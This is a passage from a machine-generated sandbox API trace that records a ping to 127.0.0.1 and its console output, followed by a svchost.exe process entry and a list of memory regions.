Timeout=0xfa0 | out: ReplyBuffer=0x765270) returned 0x1 [0118.621] InetNtopW (in: Family=2, pAddr=0x47f304, pStringBuf=0x47f42c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0118.621] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="羠vﱨG⛔\x94䰨盪✣") returned 0x16 [0118.621] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0118.621] _fileno (_File=0x76ea4c28) returned 1 [0118.621] _get_osfhandle (_FileHandle=1) returned 0x28 [0118.621] GetFileType (hFile=0x28) returned 0x2 [0118.621] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0118.621] GetLastError () returned 0x6 [0118.621] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G✣") returned 0x0 [0118.621] _fileno (_File=0x76ea4c28) returned 1 [0118.621] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0118.621] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0118.621] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x767fd8 [0118.621] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x767fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0118.621] _fileno (_File=0x76ea4c28) returned 1 [0118.621] _write (in: _FileHandle=1, _Buf=0x767fd8*, _MaxCharCount=0x16 | out: _Buf=0x767fd8*) returned 22 [0118.621] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0118.621] _fileno (_File=0x76ea4c28) returned 1 [0118.621] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0118.621] LocalFree (hMem=0x767fd8) returned 0x0 [0118.621] LocalFree (hMem=0x767fa0) returned 0x0 [0118.621] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="羠vﱨG⛿\x94䰨盪✼") returned 0x9 [0118.621] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0118.621] _fileno (_File=0x76ea4c28) returned 1 [0118.621] _get_osfhandle (_FileHandle=1) returned 0x28 [0118.621] GetFileType (hFile=0x28) returned 0x2 [0118.621] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0118.622] GetLastError () returned 0x6 [0118.622] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G✼") returned 0x0 [0118.622] _fileno (_File=0x76ea4c28) returned 1 [0118.622] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0118.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.622] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x758a78 [0118.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x758a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0118.622] _fileno (_File=0x76ea4c28) returned 1 [0118.622] _write (in: _FileHandle=1, _Buf=0x758a78*, _MaxCharCount=0x9 | out: _Buf=0x758a78*) returned 9 [0118.622] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0118.622] _fileno (_File=0x76ea4c28) returned 1 [0118.622] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0118.622] LocalFree (hMem=0x758a78) returned 0x0 [0118.622] LocalFree (hMem=0x767fa0) returned 0x0 [0118.622] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x47f29c, nSize=0x0, Arguments=0x47f298 | out: lpBuffer="羠vﱨG➷\x94䰨盪✧") returned 0x9 [0118.622] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0118.622] _fileno (_File=0x76ea4c28) returned 1 [0118.622] _get_osfhandle (_FileHandle=1) returned 0x28 [0118.622] GetFileType (hFile=0x28) returned 0x2 [0118.622] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f260 | out: lpMode=0x47f260) returned 0 [0118.622] GetLastError () returned 0x6 [0118.622] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0118.622] _fileno (_File=0x76ea4c28) returned 1 [0118.622] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0118.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.622] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x758a78 [0118.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x758a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0118.622] _fileno (_File=0x76ea4c28) returned 1 [0118.622] _write (in: _FileHandle=1, _Buf=0x758a78*, _MaxCharCount=0x9 | out: _Buf=0x758a78*) returned 9 [0118.622] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0118.622] _fileno (_File=0x76ea4c28) returned 1 [0118.622] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0118.622] LocalFree (hMem=0x758a78) returned 0x0 [0118.622] LocalFree (hMem=0x767fa0) returned 0x0 [0118.622] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="羠vﱨG⟘\x94䰨盪✨") returned 0x9 [0118.622] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0118.622] _fileno (_File=0x76ea4c28) returned 1 [0118.622] _get_osfhandle (_FileHandle=1) returned 0x28 [0118.622] GetFileType (hFile=0x28) returned 0x2 [0118.622] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0118.622] GetLastError () returned 0x6 [0118.622] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G✨") returned 0x0 [0118.622] _fileno (_File=0x76ea4c28) returned 1 [0118.622] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0118.622] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x758ac0 [0118.622] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x758ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0118.622] _fileno (_File=0x76ea4c28) returned 1 [0118.623] _write (in: _FileHandle=1, _Buf=0x758ac0*, _MaxCharCount=0x9 | out: _Buf=0x758ac0*) returned 9 [0118.623] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0118.623] _fileno (_File=0x76ea4c28) returned 1 [0118.623] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.623] LocalFree (hMem=0x758ac0) returned 0x0 [0118.623] LocalFree (hMem=0x767fa0) returned 0x0 [0118.623] Sleep (dwMilliseconds=0x3e8) [0119.635] IcmpSendEcho2Ex (in: IcmpHandle=0x756bb8, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x75c160, RequestSize=0x20, RequestOptions=0x47f314, ReplyBuffer=0x765270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x765270) returned 0x1 [0119.636] InetNtopW (in: Family=2, pAddr=0x47f304, pStringBuf=0x47f42c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0119.636] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="羠vﱨG⛔\x94䰨盪✣") returned 0x16 [0119.636] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.636] _fileno (_File=0x76ea4c28) returned 1 [0119.636] _get_osfhandle (_FileHandle=1) returned 0x28 [0119.636] GetFileType (hFile=0x28) returned 0x2 [0119.636] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0119.636] GetLastError () returned 0x6 [0119.636] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G✣") returned 0x0 [0119.636] _fileno (_File=0x76ea4c28) returned 1 [0119.636] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0119.636] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0119.636] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x767fd8 [0119.636] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x767fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0119.636] _fileno (_File=0x76ea4c28) returned 1 [0119.636] _write (in: _FileHandle=1, _Buf=0x767fd8*, _MaxCharCount=0x16 | out: _Buf=0x767fd8*) returned 22 [0119.636] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.636] _fileno (_File=0x76ea4c28) returned 1 [0119.636] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0119.636] LocalFree (hMem=0x767fd8) returned 0x0 [0119.636] LocalFree (hMem=0x767fa0) returned 0x0 [0119.636] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="羠vﱨG⛿\x94䰨盪✼") returned 0x9 [0119.636] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.636] _fileno (_File=0x76ea4c28) returned 1 [0119.636] _get_osfhandle (_FileHandle=1) returned 0x28 [0119.636] GetFileType (hFile=0x28) returned 0x2 [0119.636] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0119.636] GetLastError () returned 0x6 [0119.636] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G✼") returned 0x0 [0119.637] _fileno (_File=0x76ea4c28) returned 1 [0119.637] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0119.637] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.637] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x758970 [0119.637] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x758970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0119.637] _fileno (_File=0x76ea4c28) returned 1 [0119.637] _write (in: _FileHandle=1, _Buf=0x758970*, _MaxCharCount=0x9 | out: _Buf=0x758970*) returned 9 [0119.637] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.637] _fileno (_File=0x76ea4c28) returned 1 [0119.637] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0119.637] LocalFree (hMem=0x758970) returned 0x0 [0119.637] LocalFree (hMem=0x767fa0) returned 0x0 [0119.637] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x47f29c, nSize=0x0, Arguments=0x47f298 | out: lpBuffer="羠vﱨG➷\x94䰨盪✧") returned 0x9 [0119.637] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.637] _fileno (_File=0x76ea4c28) returned 1 [0119.637] _get_osfhandle (_FileHandle=1) returned 0x28 [0119.637] GetFileType (hFile=0x28) returned 0x2 [0119.637] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f260 | out: lpMode=0x47f260) returned 0 [0119.637] GetLastError () returned 0x6 [0119.637] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0119.637] _fileno (_File=0x76ea4c28) returned 1 [0119.637] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0119.637] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.637] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x758970 [0119.637] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x758970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0119.637] _fileno (_File=0x76ea4c28) returned 1 [0119.637] _write (in: _FileHandle=1, _Buf=0x758970*, _MaxCharCount=0x9 | out: _Buf=0x758970*) returned 9 [0119.637] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.637] _fileno (_File=0x76ea4c28) returned 1 [0119.637] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0119.637] LocalFree (hMem=0x758970) returned 0x0 [0119.637] LocalFree (hMem=0x767fa0) returned 0x0 [0119.637] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x47f298, nSize=0x0, Arguments=0x47f294 | out: lpBuffer="羠vﱨG⟘\x94䰨盪✨") returned 0x9 [0119.637] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.637] _fileno (_File=0x76ea4c28) returned 1 [0119.637] _get_osfhandle (_FileHandle=1) returned 0x28 [0119.637] GetFileType (hFile=0x28) returned 0x2 [0119.637] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f25c | out: lpMode=0x47f25c) returned 0 [0119.638] GetLastError () returned 0x6 [0119.638] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f1c0, nSize=0x50 | out: lpBuffer="G✨") returned 0x0 [0119.638] _fileno (_File=0x76ea4c28) returned 1 [0119.638] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.638] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.638] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x758a78 [0119.638] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x758a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0119.638] _fileno (_File=0x76ea4c28) returned 1 [0119.638] _write (in: _FileHandle=1, _Buf=0x758a78*, _MaxCharCount=0x9 | out: _Buf=0x758a78*) returned 9 [0119.638] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.638] _fileno (_File=0x76ea4c28) returned 1 [0119.638] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.638] LocalFree (hMem=0x758a78) returned 0x0 [0119.638] LocalFree (hMem=0x767fa0) returned 0x0 [0119.638] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x47f220, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0119.638] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x47f1f4, nSize=0x0, Arguments=0x47f1f0 | out: lpBuffer="羠vG᧰\x94䰨盪❏") returned 0x5c [0119.638] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.638] _fileno (_File=0x76ea4c28) returned 1 [0119.638] _get_osfhandle (_FileHandle=1) returned 0x28 [0119.638] GetFileType (hFile=0x28) returned 0x2 [0119.638] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f1b8 | out: lpMode=0x47f1b8) returned 0 [0119.638] GetLastError () returned 0x6 [0119.638] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f11c, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0119.638] _fileno (_File=0x76ea4c28) returned 1 [0119.638] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.638] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0119.638] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x768068 [0119.638] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x768068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0119.638] _fileno (_File=0x76ea4c28) returned 1 [0119.638] _write (in: _FileHandle=1, _Buf=0x768068*, _MaxCharCount=0x5c | out: _Buf=0x768068*) returned 92 [0119.638] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.638] _fileno (_File=0x76ea4c28) returned 1 [0119.638] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.638] LocalFree (hMem=0x768068) returned 0x0 [0119.638] LocalFree (hMem=0x767fa0) returned 0x0 [0119.638] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x47f200, nSize=0x0, Arguments=0x47f1fc | out: lpBuffer="羠vGᨧ\x94䰨盪❓") returned 0x61 [0119.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.639] _fileno (_File=0x76ea4c28) returned 1 [0119.639] _get_osfhandle (_FileHandle=1) returned 0x28 [0119.639] GetFileType (hFile=0x28) returned 0x2 [0119.639] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x47f1c4 | out: lpMode=0x47f1c4) returned 0 [0119.639] GetLastError () returned 0x6 [0119.639] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x47f128, nSize=0x50 | out: lpBuffer="G❓") returned 0x0 [0119.639] _fileno (_File=0x76ea4c28) returned 1 [0119.639] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0119.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0119.639] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x768070 [0119.639] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x768070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0119.639] _fileno (_File=0x76ea4c28) returned 1 [0119.639] _write (in: _FileHandle=1, _Buf=0x768070*, _MaxCharCount=0x61 | out: _Buf=0x768070*) returned 97 [0119.639] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0119.639] _fileno (_File=0x76ea4c28) returned 1 [0119.639] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0119.639] LocalFree (hMem=0x768070) returned 0x0 [0119.639] LocalFree (hMem=0x767fa0) returned 0x0 [0119.639] IcmpCloseHandle (IcmpHandle=0x756bb8) returned 1 [0119.639] LocalFree (hMem=0x75c160) returned 0x0 [0119.639] LocalFree (hMem=0x765270) returned 0x0 [0119.639] WSACleanup () returned 0 [0119.640] exit (_Code=0) Thread: id = 333 os_tid = 0xb94 Thread: id = 334 os_tid = 0xbd0 Process: id = "122" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5ef55000" os_pid = "0x2dc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "51" os_parent_pid = "0x324" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a1cd" [0xc000000f], "LOCAL" [0x7] Region: id = 6221 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6222 start_va = 0xb02cb00000 end_va = 0xb02cb0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02cb00000" filename = "" Region: id = 6223 start_va = 0xb02cb10000 end_va = 0xb02cb16fff entry_point = 0x0 region_type = private name = "private_0x000000b02cb10000" filename = "" Region: id = 6224 start_va = 0xb02cb20000 end_va = 0xb02cb2efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02cb20000" filename = "" Region: id = 6225 start_va = 0xb02cb30000 end_va = 0xb02cbaffff entry_point = 0x0 region_type = private name = "private_0x000000b02cb30000" filename = "" Region: id = 6226 start_va = 0xb02cbb0000 end_va = 0xb02cbb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02cbb0000" filename = "" Region: id = 6227 start_va = 0xb02cbc0000 end_va = 0xb02cbc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02cbc0000" filename = "" Region: id = 6228 start_va = 0xb02cbd0000 end_va = 0xb02cbd1fff entry_point = 0x0 region_type = private name = "private_0x000000b02cbd0000" filename = "" Region: id = 6229 start_va = 0xb02cbe0000 end_va = 0xb02cc5dfff entry_point = 0xb02cbe0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6230 start_va = 0xb02cc60000 end_va = 0xb02cc66fff entry_point = 0x0 region_type = private name = "private_0x000000b02cc60000" filename = "" Region: id = 6231 start_va = 0xb02cc70000 end_va = 0xb02cd2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02cc70000" filename = "" Region: id = 6232 start_va = 0xb02cd30000 end_va = 0xb02cd3ffff entry_point = 0x0 region_type = private name = "private_0x000000b02cd30000" filename = "" Region: id = 6233 start_va = 0xb02cd40000 end_va = 0xb02cd42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02cd40000" filename = "" Region: id = 6234 start_va = 0xb02cd50000 end_va = 0xb02cd50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02cd50000" filename = "" Region: id = 6235 start_va = 0xb02cd60000 end_va = 0xb02cd60fff entry_point = 0x0 region_type = private name = "private_0x000000b02cd60000" filename = "" Region: id = 6236 start_va = 0xb02cd70000 end_va = 0xb02cd70fff entry_point = 0x0 region_type = private name = "private_0x000000b02cd70000" filename = "" Region: id = 6237 start_va = 0xb02cd80000 end_va = 0xb02ce7ffff entry_point = 0x0 region_type = private name = "private_0x000000b02cd80000" filename = "" Region: id = 6238 start_va = 0xb02ce80000 end_va = 0xb02d007fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02ce80000" filename = "" Region: id = 6239 start_va = 0xb02d010000 end_va = 0xb02d190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02d010000" filename = "" Region: id = 6240 start_va = 0xb02d1a0000 end_va = 0xb02d59bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b02d1a0000" filename = "" Region: id = 6241 start_va = 0xb02d5a0000 end_va = 0xb02d61ffff entry_point = 0x0 region_type = private name = "private_0x000000b02d5a0000" filename = "" Region: id = 6242 start_va = 0xb02d620000 end_va = 0xb02d69ffff entry_point = 0x0 region_type = private name = "private_0x000000b02d620000" filename = "" Region: id = 6243 start_va = 0xb02d6a0000 end_va = 0xb02d974fff entry_point = 0xb02d6a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6244 start_va = 0xb02d980000 end_va = 0xb02d986fff entry_point = 0x0 region_type = private name = "private_0x000000b02d980000" filename = "" Region: id = 6245 start_va = 0xb02d990000 end_va = 0xb02da8ffff entry_point = 0x0 region_type = private name = "private_0x000000b02d990000" filename = "" Region: id = 6246 start_va = 0xb02da90000 end_va = 0xb02daf6fff entry_point = 0xb02da90000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 6247 start_va = 0xb02db00000 end_va = 0xb02db07fff entry_point = 0x0 region_type = private name = "private_0x000000b02db00000" filename = "" Region: id = 6248 start_va = 0xb02db10000 end_va = 0xb02db8ffff entry_point = 0x0 region_type = private name = "private_0x000000b02db10000" filename = "" Region: id = 6249 start_va = 0xb02db90000 end_va = 0xb02dc0ffff entry_point = 0x0 region_type = private name = "private_0x000000b02db90000" filename 